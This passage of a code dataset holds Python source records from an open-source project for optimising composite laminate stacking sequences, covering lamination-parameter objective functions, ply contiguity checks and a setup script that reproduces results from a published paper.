1)[ply_order]\r\n\r\n mom_areas[:, 0] = pos_top - pos_bot\r\n mom_areas[:, 1] = pos_top**2 - pos_bot**2\r\n mom_areas[:, 2] = pos_top**3 - pos_bot**3\r\n mom_areas /= 2\r\n\r\n n_plies_in_group = 0\r\n ind_ply_group = 0\r\n mom_areas_ply_group = np.zeros((3,), float)\r\n\r\n for ply_index in range(targets.n_plies - 1):\r\n\r\n cummul_mom_areas[ply_index:, :] += abs(mom_areas[ply_index, :])\r\n\r\n n_plies_in_group += 1\r\n mom_areas_ply_group[:] += abs(mom_areas[ply_index, :])\r\n\r\n if n_plies_in_group == n_plies_in_groups[ind_ply_group]:\r\n group_mom_areas[ind_ply_group, :] = mom_areas_ply_group\r\n ind_ply_group += 1\r\n n_plies_in_group = 0\r\n mom_areas_ply_group = np.zeros((3,), float)\r\n\r\n pos_mom_areas = np.array([\r\n (abs(pos_top[-1]) + abs(pos_bot[-1])) / 2,\r\n (abs(pos_top[-1]**2) + abs(pos_bot[-1]**2)) / 2,\r\n (abs(pos_top[-1]**3) + abs(pos_bot[-1]**3)) / 
2])\r\n\r\n cummul_mom_areas[-1, :] += pos_mom_areas\r\n mom_areas_ply_group += pos_mom_areas\r\n group_mom_areas[-1, :] += mom_areas_ply_group\r\n\r\n return mom_areas, cummul_mom_areas, group_mom_areas\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print('*** Test for the functions calc_moment_of_areas ***\\n')\r\n import sys\r\n sys.path.append(r'C:\\BELLA_and_LAYLA')\r\n\r\n from src.LAYLA_V02.constraints import Constraints\r\n from src.LAYLA_V02.targets import Targets\r\n from src.LAYLA_V02.ply_order import calc_ply_order\r\n constraints = Constraints(sym=True)\r\n targets = Targets(n_plies=21)\r\n ply_order = calc_ply_order(constraints, targets)\r\n n_plies_in_groups = np.array([5, 6])\r\n mom_areas, cummul_mom_areas, group_mom_areas = calc_mom_of_areas(\r\n constraints, targets, ply_order, n_plies_in_groups)\r\n print(mom_areas)\r\n print(cummul_mom_areas)\r\n print(group_mom_areas, sum(group_mom_areas))\r\n"
},
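A quick sanity check of the normalised through-thickness coordinates used in calc_mom_of_areas above: for a symmetric laminate the half thickness spans z from -1 (outer surface) to 0 (mid-plane), so the unsigned ply areas must sum to 1, with the middle ply of an odd-count laminate contributing only half a ply, exactly as in the function. A standalone sketch:

# Check of the ply coordinates in calc_mom_of_areas for a symmetric laminate:
# unsigned ply areas over the half thickness sum to 1.
import numpy as np

n_plies = 21
half = n_plies // 2 + n_plies % 2
ply_indices = np.arange(half)

pos_bot = (2 / n_plies) * ply_indices - 1        # lower face of each ply
pos_top = (2 / n_plies) * (ply_indices + 1) - 1  # upper face of each ply
if n_plies % 2:
    pos_top[-1] = 0.0                            # middle ply stops at z = 0

areas = pos_top - pos_bot
print(areas.sum())   # ~= 1.0: the half laminate spans z in [-1, 0]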
{
"alpha_fraction": 0.5929980278015137,
"alphanum_fraction": 0.6026627421379089,
"avg_line_length": 38.390438079833984,
"blob_id": "ac7ea80ad1f2f614a380d838d1debd972dc84292",
"content_id": "34dc263e84c45836e06c611a0e0e974c075642f2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10140,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 251,
"path": "/src/BELLA/objectives.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nobjective functions\r\n\r\n- calc_obj_one_panel\r\n calculates objective function value for a single panel during beam_search\r\n with no consideration of the penalties for the design rules\r\n\r\n- calc_obj_each_panel\r\n calculates objective function of multi-panel structures during beam search\r\n with no consideration of the penalties for the design rules\r\n\r\n- calc_obj_multi_panel\r\n calculates objective function of a multi_panel structure considering the\r\n penalties for the design and manufacturing guidelines\r\n\r\n- calc_unconst_obj_multi_panel_A\r\n calculates the unconstrained in-plane objective function values for\r\n multi-panel structures\r\n\r\n- calc_unconst_obj_multi_panel_D\r\n calculates the unconstrained out-of-plane objective function values for\r\n multi-panel structures\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.buckling.buckling import buckling_factor\r\n\r\ndef calc_obj_one_panel(\r\n lampam,\r\n lampam_target,\r\n lampam_weightings=np.array([])):\r\n \"\"\"\r\n calculates objective function value for a single panel during beam_search\r\n with no consideration of the penalties for the design rules\r\n\r\n INPUTS\r\n\r\n - lampam: panel lamination parameters\r\n - lampam_target: target lamination parameters\r\n - lampam_weightings: weights of the lamination parameters in the objective\r\n function\r\n - obj_func_param: objective function parameters\r\n \"\"\"\r\n return lampam_weightings@((lampam - lampam_target)**2)\r\n\r\n\r\ndef calc_obj_each_panel(\r\n multipanel, lampam, obj_func_param, mat=0, lampam_weightings=[]):\r\n \"\"\"\r\n calculates objective function of multi-panel structures during beam search\r\n with no consideration of the penalties for the design rules\r\n\r\n INPUTS\r\n\r\n - multipanel: multi-panel class instance\r\n - lampam: group partial lamination parameters\r\n - lampam_weightings: weightings for each lamination parameter\r\n - mat: material properties of the laminae\r\n - obj_func_param: objective function parameters\r\n \"\"\"\r\n objectives = np.zeros((multipanel.reduced.n_panels), dtype=float)\r\n\r\n for ind_panel, panel in enumerate(multipanel.reduced.panels):\r\n\r\n# print('lampam[ind_panel]', lampam[ind_panel])\r\n# print('panel.lampam_target', panel.lampam_target)\r\n# print('lampam_weightings[ind_panel]', lampam_weightings[ind_panel])\r\n\r\n objectives[ind_panel] = calc_obj_one_panel(\r\n lampam=lampam[ind_panel],\r\n lampam_target=panel.lampam_target,\r\n lampam_weightings=lampam_weightings[ind_panel])\r\n \r\n return objectives\r\n\r\n\r\ndef calc_obj_multi_panel(\r\n objective,\r\n actual_panel_weightings,\r\n penalty_diso=0,\r\n penalty_contig=0,\r\n penalty_10=0,\r\n penalty_bal_ipo=0,\r\n penalty_oopo=0,\r\n penalty_weight=0,\r\n coeff_diso=0,\r\n coeff_contig=0,\r\n coeff_10=0,\r\n coeff_bal_ipo=0,\r\n coeff_oopo=0,\r\n coeff_weight=0,\r\n with_Nones=False):\r\n \"\"\"\r\n calculates objective function of a multi_panel structure considering the\r\n penalties for the design and manufacturing guidelines\r\n\r\n INPUTS\r\n\r\n - objective: objective function value of each panel with no\r\n consideration of the penalties for the design rules\r\n - actual_panel_weightings: weightings of the different panels in the\r\n objective function\r\n - penalty_diso: penalty of each panel for the disorientation constraint\r\n - penalty_contig: penalty of each panel for the 
contiguity constraint\r\n - penalty_10: penalty of each panel for the 10% rule constraint\r\n - penalty_bal_ipo: penalty of each panel for in-plane orthotropy/balance\r\n - penalty_oopo: penalty of each panel for out-of-plane orthotropy\r\n - penalty_weight: penalty of each panel for weight\r\n - coeff_diso: weight of the penalty for the disorientation rule\r\n - coeff_contig: weight of the penalty for the contiguity rule\r\n - coeff_10: weight of the penalty for the 10% rule\r\n - coeff_bal_ipo: weight of the penalty for in-plane orthotropy/balance\r\n - coeff_oopo: weight of the penalty for out-of-plane orthotropy\r\n - coeff_weight: weight of the penalty for weight\r\n \"\"\"\r\n# print(penalty_weight)\r\n# print(penalty_diso)\r\n# print(penalty_contig)\r\n# print(penalty_bal_ipo)\r\n# print(penalty_oopo)\r\n# print(penalty_10)\r\n# print(objective)\r\n if not with_Nones:\r\n return sum(actual_panel_weightings * objective \\\r\n * (1 + coeff_diso * penalty_diso) \\\r\n * (1 + coeff_contig * penalty_contig) \\\r\n * (1 + coeff_10 * penalty_10) \\\r\n * (1 + coeff_bal_ipo * penalty_bal_ipo) \\\r\n * (1 + coeff_oopo * penalty_oopo) \\\r\n * (1 + coeff_weight * penalty_weight))\r\n my_sum = 0\r\n for ind in range(actual_panel_weightings.size):\r\n if objective[ind] is not None:\r\n to_add = actual_panel_weightings[ind] * objective[ind]\r\n \r\n if penalty_diso is not None:\r\n if (isinstance(penalty_diso, list) \\\r\n and len(penalty_diso) > 1) or penalty_diso.size > 1:\r\n to_add *= (1 + coeff_diso * penalty_diso[ind])\r\n else:\r\n to_add *= (1 + coeff_diso * penalty_diso)\r\n \r\n if penalty_contig is not None:\r\n if (isinstance(penalty_contig, list) \\\r\n and len(penalty_contig) > 1) or penalty_contig.size > 1:\r\n to_add *= (1 + coeff_contig * penalty_contig[ind])\r\n else:\r\n to_add *= (1 + coeff_contig * penalty_contig)\r\n\r\n if penalty_10 is not None:\r\n if (isinstance(penalty_10, list) and len(penalty_10) > 1) \\\r\n or penalty_10.size > 1:\r\n to_add *= (1 + coeff_10 * penalty_10[ind])\r\n else:\r\n to_add *= (1 + coeff_10 * penalty_10)\r\n\r\n if penalty_oopo is not None:\r\n if (isinstance(penalty_oopo, list) \\\r\n and len(penalty_oopo) > 1) or penalty_oopo.size > 1:\r\n to_add *= (1 + coeff_oopo * penalty_oopo[ind])\r\n else:\r\n to_add *= (1 + coeff_oopo * penalty_oopo)\r\n\r\n if penalty_bal_ipo is not None:\r\n to_add *= (1 + coeff_bal_ipo * penalty_bal_ipo[ind])\r\n\r\n if penalty_weight is not None:\r\n to_add *= (1 + coeff_weight * penalty_weight[ind])\r\n\r\n my_sum += to_add\r\n return my_sum\r\n\r\ndef calc_unconst_obj_multi_panel_A(\r\n multipanel, lampamA, obj_func_param, inner_step=-1, mat=0):\r\n \"\"\"\r\n calculates unconstrained in-plane objective function for multi-panel\r\n structures\r\n\r\n INPUTS\r\n\r\n - multipanel: multi-panel class instance\r\n - lampamA: in-plane partial lamination parameters\r\n - inner_step: inner loop step number\r\n - mat: material properties of the laminae\r\n - obj_func_param: objective function parameters\r\n \"\"\"\r\n objectives = np.zeros((multipanel.reduced.n_panels), dtype=float)\r\n if inner_step == -1:\r\n for ind_reduced_panel in range(multipanel.reduced.n_panels):\r\n objectives[ind_reduced_panel] = calc_obj_one_panel(\r\n lampam=lampamA[ind_reduced_panel],\r\n lampam_target=multipanel.panels[\r\n multipanel.ind_for_reduc[\r\n ind_reduced_panel]].lampam_target[:4],\r\n lampam_weightings=multipanel.panels[\r\n multipanel.ind_for_reduc[\r\n ind_reduced_panel]].lampam_weightings[:4])\r\n else:\r\n for 
ind_reduced_panel in range(multipanel.reduced.n_panels):\r\n objectives[ind_reduced_panel] = calc_obj_one_panel(\r\n lampam=lampamA[ind_reduced_panel],\r\n lampam_target=multipanel.panels[\r\n multipanel.ind_for_reduc[\r\n ind_reduced_panel]].lampam_target[:4],\r\n lampam_weightings=multipanel.panels[\r\n multipanel.ind_for_reduc[\r\n ind_reduced_panel]].lampam_weightings[:4])\r\n return sum(obj_func_param.reduced_actual_panel_weightingsA * objectives)\r\n\r\ndef calc_unconst_obj_multi_panel_D(\r\n multipanel, lampamD, obj_func_param, inner_step=-1, mat=0):\r\n \"\"\"\r\n calculates the unconstrained out-of-plane objective function values for\r\n multi-panel structures\r\n\r\n INPUTS\r\n\r\n - multipanel: multi-panel class instance\r\n - lampamD: out-of-plane partial lamination parameters\r\n - inner_step: inner loop step number\r\n - mat: material properties of the laminae\r\n - obj_func_param: objective function parameters\r\n \"\"\"\r\n objectives = np.zeros((multipanel.reduced.n_panels), dtype=float)\r\n if inner_step == -1:\r\n for ind_reduced_panel in range(multipanel.reduced.n_panels):\r\n objectives[ind_reduced_panel] = calc_obj_one_panel(\r\n lampam=lampamD[ind_reduced_panel],\r\n lampam_target=multipanel.panels[\r\n multipanel.ind_for_reduc[\r\n ind_reduced_panel]].lampam_target[8:12],\r\n lampam_weightings=multipanel.panels[\r\n multipanel.ind_for_reduc[\r\n ind_reduced_panel]].lampam_weightings[8:12])\r\n else:\r\n for ind_reduced_panel in range(multipanel.reduced.n_panels):\r\n objectives[ind_reduced_panel] = calc_obj_one_panel(\r\n lampam=lampamD[ind_reduced_panel],\r\n lampam_target=multipanel.panels[\r\n multipanel.ind_for_reduc[\r\n ind_reduced_panel]].lampam_target[8:12],\r\n lampam_weightings=multipanel.panels[\r\n multipanel.ind_for_reduc[\r\n ind_reduced_panel]].lampam_weightings[8:12])\r\n return sum(obj_func_param.reduced_actual_panel_weightingsD * objectives)\r\n\r\n"
},
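calc_obj_one_panel above is simply a weighted squared distance between the achieved and target lamination parameters. A worked example with toy numbers:

# Worked example of the per-panel objective: a weighted squared distance
# between achieved and target lamination parameters (toy values).
import numpy as np

lampam = np.array([0.2, 0.0, -0.1, 0.0])
lampam_target = np.array([0.5, 0.0, 0.0, 0.0])
lampam_weightings = np.array([1.0, 1.0, 0.5, 0.0])

obj = lampam_weightings @ ((lampam - lampam_target) ** 2)
print(obj)   # ~= 0.095 = 1.0*0.09 + 1.0*0.0 + 0.5*0.01 + 0.0*0.0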
{
"alpha_fraction": 0.32939377427101135,
"alphanum_fraction": 0.3526574969291687,
"avg_line_length": 38.0095100402832,
"blob_id": "bc5fd8d4d32c795540d20e298968ba8cbe83a60c",
"content_id": "b6ba1aa4e056bd3d9565770507c3ae49bf367a18",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 29445,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 736,
"path": "/src/guidelines/external_contig.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunction to ensure external sorting for contiguity\r\n'across adjacent sublaminates'\r\n\r\nCreated on Mon Jan 29 12:00:18 2018\r\n\r\n@author: Noemie Fedon\r\n\"\"\"\r\n\r\nimport numpy as np\r\n\r\ndef external_contig(angle, n_plies_group, constraints, ss_before, angle2 = None):\r\n '''\r\nreturns only the stacking sequences that satisfy constraints concerning\r\ncontiguity at the junction with an adjacent group of plies, but not within the\r\ngroup of plies\r\n\r\nOUTPUTS\r\n\r\n- angle: the selected sublaminate stacking sequences line by\r\nline\r\n- angle2: the selected sublaminate stacking sequences line by\r\nline if a second sublaminate is given as input for angle2\r\n\r\nINPUTS\r\n\r\n- angle: the first sublaminate stacking sequences\r\n- angle:2 matrix storing the second sublaminate stacking sequences\r\n- ss_before is the stacking sequence of the sublaminate adjacent to the first\r\nsublaminate\r\n\r\n '''\r\n if angle.ndim == 1:\r\n angle = angle.reshape((1, angle.size))\r\n\r\n ss_beforeLength = ss_before.size\r\n\r\n # CHECK FOR CORRECT INPUTS SIZE\r\n if n_plies_group > angle.shape[1]:\r\n raise Exception('The input set of angles have fewer elements that what is asked to be checked')\r\n\r\n if angle2 is None:\r\n\r\n # TO ENSURE CONTIGUITY\r\n if constraints.contig:\r\n\r\n # To ensure the contiguity constraint at the junction of ply groups\r\n if ss_beforeLength>=1:\r\n\r\n if constraints.n_contig ==2:\r\n\r\n if n_plies_group>1:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 3:\r\n\r\n if n_plies_group>2:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 4:\r\n\r\n if n_plies_group>3:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1] \\\r\n and angle[ii, 3] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 5:\r\n\r\n if n_plies_group>4:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1] \\\r\n and angle[ii, 3] == ss_before[-1]\\\r\n and angle[ii, 4] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 6:\r\n\r\n if n_plies_group>5:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1] \\\r\n and angle[ii, 3] == ss_before[-1] \\\r\n and angle[ii, 4] == ss_before[-1] \\\r\n and angle[ii, 5] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n else:\r\n raise Exception(\r\n 'constraints.n_contig must be 2, 3, 4 or 5')\r\n\r\n\r\n if ss_beforeLength>=2:\r\n if constraints.n_contig ==2:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 0] == ss_before[-2]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif 
constraints.n_contig in (3, 4, 5, 6):\r\n\r\n                # the last two plies of ss_before and the first\r\n                # n_contig - 1 plies of the new ply group must not all\r\n                # be identical\r\n                n_new = constraints.n_contig - 1\r\n                if n_plies_group >= n_new:\r\n                    for ii in range(angle.shape[0])[::-1]:\r\n                        if ss_before[-2] == ss_before[-1] \\\r\n                        and np.all(angle[ii, :n_new] == ss_before[-1]):\r\n                            angle = np.delete(angle, np.s_[ii], axis=0)\r\n\r\n            else:\r\n                raise Exception(\r\n                    'constraints.n_contig must be 2, 3, 4, 5 or 6')\r\n\r\n        # junctions made of jj plies at the end of ss_before followed by\r\n        # n_contig + 1 - jj plies of the new ply group must not be made\r\n        # of identical ply angles\r\n        for jj in range(3, constraints.n_contig + 1):\r\n\r\n            if ss_beforeLength < jj:\r\n                break\r\n            n_new = constraints.n_contig + 1 - jj\r\n            if n_plies_group < n_new \\\r\n            or not np.all(ss_before[-jj:] == ss_before[-1]):\r\n                continue\r\n\r\n            for ii in range(angle.shape[0])[::-1]:\r\n                if np.all(angle[ii, :n_new] == ss_before[-1]):\r\n                    angle = np.delete(angle, np.s_[ii], axis=0)\r\n\r\n    else:\r\n\r\n        # TO ENSURE CONTIGUITY\r\n        if constraints.contig:\r\n\r\n            if constraints.n_contig not in (2, 3, 4, 5, 6):\r\n                raise Exception(\r\n                    'constraints.n_contig must be 2, 3, 4, 5 or 6')\r\n\r\n            # To ensure the contiguity constraint at the junction of ply\r\n            # groups: junctions made of jj plies at the end of ss_before\r\n            # followed by n_contig + 1 - jj plies of the new ply group\r\n            # must not be made of identical ply angles\r\n            for jj in range(1, constraints.n_contig + 1):\r\n\r\n                if ss_beforeLength < jj:\r\n                    break\r\n                n_new = constraints.n_contig + 1 - jj\r\n                if n_plies_group < n_new \\\r\n                or not np.all(ss_before[-jj:] == ss_before[-1]):\r\n                    continue\r\n\r\n                for ii in range(angle.shape[0])[::-1]:\r\n                    if np.all(angle[ii, :n_new] == ss_before[-1]):\r\n                        angle = np.delete(angle, np.s_[ii], axis=0)\r\n\r\n    return angle, angle2\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    'Test'\r\n\r\n    import sys\r\n    sys.path.append(r'C:\\BELLA')\r\n    from src.LAYLA_V02.constraints import Constraints\r\n    from src.divers.pretty_print import print_ss, print_list_ss\r\n\r\n    constraints = Constraints()\r\n    constraints.contig = True\r\n    constraints.n_contig = 2\r\n\r\n    print('*** Test for the function external_contig ***\\n')\r\n    print('Input stacking sequences:\\n')\r\n    ss = np.array([[-45, -45, 0, 45, 90], [0, 45, 45, 45, 45],\r\n                   [0, 0, 0, 45, 45]])\r\n    print_list_ss(ss)\r\n    print('Stacking sequence of adjacent sublaminate:\\n')\r\n    ss_before = np.array([-45])\r\n    print_ss(ss_before)\r\n    n_plies_group = 5\r\n    middle_ply = 0\r\n    test, _ = external_contig(ss, n_plies_group, constraints, ss_before, ss)\r\n    if test.shape[0]:\r\n        print('Stacking sequences satisfying the rule:\\n')\r\n        print_list_ss(test)\r\n    else:\r\n        print('No stacking sequences satisfy the rule\\n')"
},
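The `external_contig` pruning stored in the record above spells out one `if`/`elif` branch for every `(ss_beforeLength, n_contig)` pair, but every branch applies a single rule: a candidate ply group is rejected when, for some `j`, the last `j` plies of the previous sublaminate and the first `n_contig + 1 - j` plies of the candidate all have the same angle, since that would create more than `n_contig` contiguous identical plies across the junction. The sketch below is a minimal standalone illustration of that rule, assuming a 2-D `angle` array of candidate rows; the function name `prune_junction_contiguity` and the example data are hypothetical, not part of the BELLA code base.

    import numpy as np

    def prune_junction_contiguity(angle, ss_before, n_plies_group, n_contig):
        # hypothetical standalone sketch, not the BELLA API:
        # drop candidate rows that would create more than n_contig
        # identical consecutive ply angles across the junction
        keep = []
        for row in angle:
            violated = False
            # j plies taken from the end of ss_before, the rest from row
            for j in range(1, min(len(ss_before), n_contig) + 1):
                n_new = n_contig + 1 - j
                if n_new > n_plies_group:
                    continue
                if np.all(ss_before[-j:] == ss_before[-1]) \
                        and np.all(row[:n_new] == ss_before[-1]):
                    violated = True
                    break
            if not violated:
                keep.append(row)
        return np.array(keep)

    # with n_contig = 2, a group starting [45, 45, ...] after a trailing
    # 45-deg ply gives three contiguous 45-deg plies and is pruned
    angle = np.array([[-45, -45, 0, 45, 90], [45, 45, 0, 45, 90]])
    print(prune_junction_contiguity(angle, np.array([45]), 5, 2))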
{
"alpha_fraction": 0.45272988080978394,
"alphanum_fraction": 0.5437979102134705,
"avg_line_length": 37.06080627441406,
"blob_id": "70985a71077b7e18a5368ad23c756092c31baa9c",
"content_id": "78333702d165a958f32df86ab7f0a5538a88f884",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 41760,
"license_type": "permissive",
"max_line_length": 145,
"num_lines": 1069,
"path": "/src/LAYLA_V02/scripts/run_LAYLA_table_4_liu_kennedy.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nLAYLA retrieves the LAminate LAY-ups from lamination parameters corresponding\r\nto the Table 4 in the publication:\r\n\r\n \"Two-level layup optimization of composite laminate using lamination\r\n parameters \" Liu X Featherston C Kennedy D\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\nimport numpy.matlib\r\nimport pandas as pd\r\nimport time\r\nimport sys\r\nsys.path.append(r'C:\\BELLA_and_LAYLA')\r\nfrom src.LAYLA_V02.targets import Targets\r\nfrom src.LAYLA_V02.parameters import Parameters\r\nfrom src.LAYLA_V02.constraints import Constraints\r\nfrom src.LAYLA_V02.optimiser import LAYLA_optimiser\r\nfrom src.LAYLA_V02.objectives import objectives\r\n\r\nfrom src.BELLA.materials import Material\r\n\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.CLA.ABD import A_from_lampam, B_from_lampam, D_from_lampam\r\n\r\nfrom src.guidelines.one_stack import check_lay_up_rules\r\n\r\nfrom src.divers.excel import autofit_column_widths\r\nfrom src.divers.excel import delete_file, append_df_to_excel\r\nfrom src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\n\r\nfrom src.LAYLA_V02.save_set_up import save_constraints_LAYLA\r\nfrom src.LAYLA_V02.save_set_up import save_parameters_LAYLA_V02\r\nfrom src.LAYLA_V02.save_set_up import save_materials\r\n\r\n\r\nresult_filename = 'LAYLA_vs_global_layerwise_optimisation.xlsx'\r\ndelete_file(result_filename)\r\n\r\n#==============================================================================\r\n# design and manufacturing constraints\r\n#==============================================================================\r\nset_of_angles = np.array([-45, 0, 45, 90], dtype=int)\r\n#set_of_angles = np.array([-45, 0, 45, 90, +30, -30, +60, -60], dtype=int)\r\n\r\n# rule 1: one outer ply at + or -45 deg at laminate surfaces\r\n# rule 2: [+45, -45] or [-45, +45] plies at laminate surfaces\r\n# rule 3: [+45, -45], [+45, +45], [-45, -45] or [-45, +45] plies at laminate\r\ndam_tol_rule = 3\r\n\r\ncombine_45_135 = False\r\npercent_0 = 10 # percentage used in the 10% rule for 0 deg plies\r\npercent_45 = 10 # percentage used in the 10% rule for +45 deg plies\r\npercent_90 = 10 # percentage used in the 10% rule for 90 deg plies\r\npercent_135 = 10 # percentage used in the 10% rule for -45 deg plies\r\npercent_45_135 = 10 # percentage used in the 10% rule for +-45 deg plies\r\n\r\ndelta_angle = 45\r\n\r\nn_contig = 4\r\n\r\n#==============================================================================\r\n# Material properties\r\n#==============================================================================\r\n# Elastic modulus in the fibre direction (Pa)\r\nE11 = 128e9\r\n# Elastic modulus in the transverse direction (Pa)\r\nE22 = 10.3e9\r\n# Poisson's ratio relating transverse deformation and axial loading (-)\r\nnu12 = 0.3\r\n# In-plane shear modulus (Pa)\r\nG12 = 6e9\r\nmat_prop = Material(E11 = E11, E22 = E22, G12 = G12, nu12 = nu12)\r\n\r\n#==============================================================================\r\n# Optimiser Parameters\r\n#==============================================================================\r\nn_outer_step = 5\r\n\r\n# branching limit for global pruning during ply orientation optimisation\r\nglobal_node_limit = 10\r\n# branching limit for local pruning during ply orientation optimisation\r\nlocal_node_limit = 10\r\n# branching limit for global pruning at the penultimate level during ply\r\n# orientation 
optimisation\r\nglobal_node_limit_p = 10\r\n# branching limit for local pruning at the last level during ply\r\n# orientation optimisation\r\nlocal_node_limit_final = 1\r\n\r\n### Techniques to enforce the constraints\r\n# repair to improve the convergence towards the in-plane lamination parameter\r\n# targets\r\nrepair_membrane_switch = True\r\n# repair to improve the convergence towards the out-of-plane lamination\r\n# parameter targets\r\nrepair_flexural_switch = True\r\n\r\n# penalty for the 10% rule based on ply count restrictions\r\npenalty_10_pc_switch = False\r\n# penalty for the 10% rule based on lamination parameter restrictions\r\npenalty_10_lampam_switch = False\r\n# penalty for in-plane orthotropy, based on lamination parameters\r\npenalty_ipo_switch = False\r\n# penalty for balance, based on ply counts\r\npenalty_bal_switch = False\r\n# balanced laminate scheme\r\nbalanced_scheme = False\r\n\r\n# Coefficient for the 10% rule penalty\r\ncoeff_10 = 1\r\n# Coefficients for the in-plane orthotropy penalty or the balance penalty\r\ncoeff_bal_ipo = 1\r\n# Coefficient for the out-of-plane orthotropy penalty\r\ncoeff_oopo = 1\r\n\r\n# percentage of laminate thickness for plies that can be modified during\r\n# the refinement of membrane properties\r\np_A = 80\r\n# number of plies in the last permutation during repair for disorientation\r\n# and/or contiguity\r\nn_D1 = 6\r\n# number of ply shifts tested at each step of the re-designing process during\r\n# refinement of flexural properties\r\nn_D2 = 10\r\n# number of times the algorithms 1 and 2 are repeated during the flexural\r\n# property refinement\r\nn_D3 = 2\r\n\r\n### Other parameters\r\noptimisation_type = 'AD'\r\n\r\n# Lamination parameters to be considered in the multi-objective functions\r\nlampam_to_be_optimised = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])\r\n\r\n# Lamination parameter sensitivities from the first-level optimiser\r\nfirst_level_sensitivities = np.ones((12,), float)\r\n\r\n# Minimum group size allowed for the smallest groups\r\ngroup_size_min = 5\r\n# Desired number of plies for the groups at each outer loop\r\ngroup_size_max = np.array([1000, 12, 12, 12, 12])\r\n\r\n#==============================================================================\r\ntimesK = [3600, 7.10, 7.40, 0.95, 1.40, 5.87, 5.30, 0.64, 0.91,\r\n          3600, 5.95, 6.34, 0.90, 1.59, 9.06, 6.55, 1.01, 1.37\r\n          ]\r\n\r\ncomments = ['Normal',\r\n            'Symmetric',\r\n            'Sym + contiguity',\r\n            'Sym + disorientation',\r\n            'Sym + disorientation',\r\n            'Sym + 10%',\r\n            'Sym + 10% + contiguity + damtol',\r\n            'Sym + 10% + contiguity + damtol + disorientation',\r\n            'Sym + 10% + contiguity + damtol + disorientation',\r\n            'Balanced',\r\n            'Sym + bal',\r\n            'Sym + bal + contiguity',\r\n            'Sym + bal + disorientation',\r\n            'Sym + bal + disorientation',\r\n            'Sym + bal + 10%',\r\n            'Sym + bal + 10% + contiguity + damtol',\r\n            'Sym + bal + 10% + contiguity + damtol + disorientation',\r\n            'Sym + bal + 10% + contiguity + damtol + disorientation',\r\n            ]\r\n\r\nply_counts = [28, 28, 28, 28, 29, 28, 28, 28, 29,\r\n              28, 28, 28, 28, 29, 28, 28, 28, 29\r\n              ]\r\n\r\nlampam_targets = [\r\n    np.array([-0.168, -0.0854, 0.0097, 0,\r\n              -0.0072, -0.0072, -0.0072, 0,\r\n              0.0746, -0.7087, -0.0261, 0]),\r\n    np.array([-0.1913, -0.0612, -0.0344, 0,\r\n              0, 0, 0, 0,\r\n              0.0259, -0.7922, -0.0303, 0]),\r\n    np.array([-0.0888, -0.2551, 0.0856, 0,\r\n              0, 0, 0, 0,\r\n              0.0628, -0.8113, -0.0123, 0]),\r\n    np.array([-0.1542, -0.0802, 0, 0,\r\n              -0.029, -0.029, -0.029, 0,\r\n              0.0299, -0.8037, -0.0598, 
